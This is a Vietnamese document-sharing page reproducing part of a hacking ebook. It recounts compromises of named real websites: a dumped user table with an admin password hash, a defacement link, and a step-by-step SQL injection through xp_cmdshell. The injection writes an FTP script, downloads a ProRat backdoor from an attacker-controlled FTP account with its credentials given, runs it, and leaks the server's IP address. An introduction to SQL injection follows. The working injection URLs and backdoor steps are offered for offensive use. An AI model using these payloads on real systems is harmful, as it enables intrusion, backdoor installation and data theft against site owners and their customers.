1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 216 pps

6 117 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 92,75 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Phần này có chức năng show ra table và column nếu như bạn biết login và password của CSDL cái ở trong file dbconfig.php đó Giờ chỉ việc thay user và pass mà ta kiếm được ở trên vào và s

Trang 1

Phần này có chức năng show ra table và column nếu như bạn biết login và password của CSDL

(cái ở trong file dbconfig.php đó)

Giờ chỉ việc thay user và pass mà ta kiếm được ở trên vào và show :

Có gì nào , tables và column của database show ra hết hehe

Kéo lui xuống dưới tìm table của admin :

Trích:

| - xhp_users

| - id

| - username

| - password

| - session_id

| - first_name

| - last_name

Có trong tay tên các table và thông tin về CSDL rồi ta query table admin để tìm user và pass :

Có gì nào : id ; username ; password ; session_id

Trích:

admin

1004munkmunk1968

5ba8d1b662edeed1cd304ac98b62fde3

Trang 2

Rồi vô trang chủ vào phần admin để login vào

Còn đây là cái Cpanel

hehe :

Trích:

http://www.leonida.ro/hacked.htm

Dondoc(vniss)

Up back door khi co' DBO, lay tu Nha truyen thong :D

Tác giả: famydmx, post trong Vniss cũ, bài viết khá rõ ràng và dễ hiểu

Chào các bạn, tui chỉ là 1 newbie ở đây thui Trước đây tui cũng thắc mắc về cách upload backdoor lên server dữ lắm Sau khi vào Matrix để học hỏi thì vừa rùi tui đã

up được 1 con lên server, hehe Tui sẽ post quá trình upload mà tui đã làm để mọi người tham khảo (site là www.naame.com và backdoor tui đã up là ProRat 1.8)

Bạn phải chuẩn bị sẵn 1 account FTP chứa backdoor mà mình muốn up lên (như netcat hay con ProRat mà tui đang dùng chẳng hạn)

Bạn có thể tạo tại site www.esmartweb.com Log in vào account đó sau đó click vào link Enable FTP access rồi dùng ftp để up backdoor lên (username và

password mà bạn đã đăng ký, địa chỉ ftpserver lấy từ mail nó gởi cho bạn) Tui đã tạo sẵn 1 account như vậy :

username : hyunjlove

password : password

ftpserver : ftpserver.esmartdesign.com

Đầu tiên xác định user hiện tại có phải là dbo (chủ của database) không ? Hình như là chỉ có dbo mới được dùng master xp_cmdshell để up backdoor lên, tui

Trang 3

không biết các user khác dbo có dùng được không nữa, hihi

Các đoạn code thêm vào đều nằm sau :

http://www.naame.com/whois1.asp?from rstpage&dname=

http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname='%20o r%201=convert(int,user_name()) sp_password

Nó sẽ báo lỗi như vầy :

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'dbo' to a column of data type int /includeFiles/whois1.asp, line 27

user hiện tại đúng là dbo!

Tiếp theo sẽ tạo 1 kịch bản trên server để up, file script tui sẽ tạo tên là s có nội dung như sau :

open ftpserver.esmartdesign.com

user hyunjlove password

bin

get accsvr.exe

quit

hyunjlove và password chính là username và password của tui, accsvr.exe là con backdoor của tui

Để tạo script trên bạn lần lượt đánh vào các URL sau :

http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'echo%20open%20ftpserver

.esmartdesign.com%20>>s' sp_password

http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'echo%20user%20hyunjlove

%20password%20>>s' sp_password

Trang 4

http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'echo%20bin%20>>s' sp_password

http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'echo%20get%20accsvr.exe %20>>s' sp_password

http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'echo%20quit%20>>s' sp_password

Chạy ftp trên server để lấy backdoor về :

http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'ftp%20-v%20-i%20-n%20-s:s' sp_password

Chờ 5 phút! hehe

- Chạy con backdoor trên server như sau :

http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'accsvr.exe' sp_password

- Hehe, việc còn lại là cần tìm là tìm địa chỉ IP của cái server mình vừa upload lên (thường thì server chạy SQL Server nằm cùng với host của site đó nhưng mà trường hợp này thì hic hic, nó nằm ở chỗ khác!)

http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';cre ate%20table%20systablesz(a%20int%20identity,b%20va

rchar(1000))%20insert%20into%20systablesz%20exec%2

0master xp_cmdshell%20'ipconfig' sp_password

http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname='%20o r%201=convert(int,(select%20top%201%20b%20from%20s

ystablesz%20where%20b%20like%20'%25IP Address%25')) sp_password

Nó sẽ hiện thông báo lỗi như thế này :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address : 65.210.194.10 ' to a column of data type int

Trang 5

Vậy là IP của server là 65.210.194.10

- Connect vào server :

Vào google search "ProRat v1.8 download", down con này về Chạy file

prorat.exe, gõ IP vào rùi click nút connect thế là vào được server, tiếc rằng trong này chẳng có gì hay cả

by famydmx

SQL Injection Tutorial

//********************//

//*******INTRO:*******//

//********************//

Hầu hết các chương trình ứng dụng web mới đều dựa trên cấu trúc dữ liệu động để

để đạt được tính hấp dẫn của các chương trình desktop cổ điển Cơ chế động này đạt được bằng cách thu thập dữ liệu từ 1 database Một trong những nền database phổ biến hơn cả trong các ứng dụng e-shop là SQL Rất nhiều các ứng dụng web chỉ dựa hoàn toàn vào những scripts ở đầu vào ( phía người dùng - client ), những đoạn scripts này chỉ đơn giản là truy vấn 1 SQL database nằm ở ngay trên

webserver hay nằm trên 1 hệ thống đầu cuối ( phía server ) riêng biệt Một trong những cách tấn công khó bị nhận thấy và nguy hiểm nhất lên 1 ứng dụng web bao gồm việc chiếm đoạt những chuỗi truy vấn được dùng bởi các scripts, để đoạt quyền điểu khiển ứng dụng đó hoặc các dữ liệu của nó Một trong những cơ chế hiệu quả nhất để đạt được điều đó là một kỹ thuật gọi là SQL injection ( kỹ thuật chèn những câu lệnh SQL )

//********************//

//*****CONTENTS:******//

//********************//

Cơ sở dữ liệu là trái tim của một website thương mại Một cuộc tấn công vào

Trang 6

server lưu giữ CSDL có thể gây ra thất thoát lớn về tài chính cho công ty Thông thường CSDL bị hack để lấy các thông tin về thẻ tín dụng Chỉ cần một cuộc tấn công sẽ làm giảm uy tín và lượng khách hàng bởi vì họ muốn thông tin về CC của mình được an toàn Hầu hết các website thương mại dùng Microsoft SQL (MSSql)

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN